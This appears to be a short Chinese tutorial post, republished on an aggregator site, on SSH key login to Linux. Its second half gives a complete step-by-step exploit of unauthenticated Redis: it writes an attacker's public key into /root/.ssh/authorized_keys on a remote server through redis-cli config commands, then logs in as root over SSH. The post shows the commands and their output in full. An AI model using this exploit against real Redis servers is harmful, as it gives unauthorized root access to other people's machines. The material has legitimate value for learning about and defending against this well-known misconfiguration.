使用密钥认证机制远程登录Linux
Posted 17bdw随手笔记
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了使用密钥认证机制远程登录Linux相关的知识,希望对你有一定的参考价值。
密钥认证机制
创建存放key的文件
1)创建目录 /root/.ssh 并设置权限
[[email protected] ~]# mkdir /root/.ssh mkdir 命令用来创建目录,以后会详细介绍,暂时只了解即可。
[[email protected] ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的,以后会详细介绍。
2)创建文件 / root/.ssh/authorized_keys
[[email protected] ~]# vim /root/.ssh/authorized_keys
生成Key
Xshell-【新建用户密钥生成向导】,密钥类型选择RSA,密钥长度选择2048位,生成密钥名称,加密的密码。
复制生成的公钥到远程linux里面 /root/.ssh/authorized_keys 文件中。如果没有.ssh目录,就自行建立,并更改目录权限为700。粘贴公钥的内容,保存退出。
就可以利用密钥登录了
漏洞场景-redis未授权访问漏洞
1)本地生成秘钥
[email protected]:~# ssh-keygen -t rsa
2)将公钥写入一个文件
[email protected]:~# cd /root/.ssh/
[email protected]:~/.ssh# (echo -e "
"; cat id_rsa.pub; echo -e "
") > foo.txt
3)连接redis写入文件
[email protected]:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
OK
[email protected]:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
[email protected]:~/.ssh# ssh
4)连接服务器
[email protected]:~/.ssh# ssh -i id_rsa [email protected]
以上是关于使用密钥认证机制远程登录Linux的主要内容,如果未能解决你的问题,请参考以下文章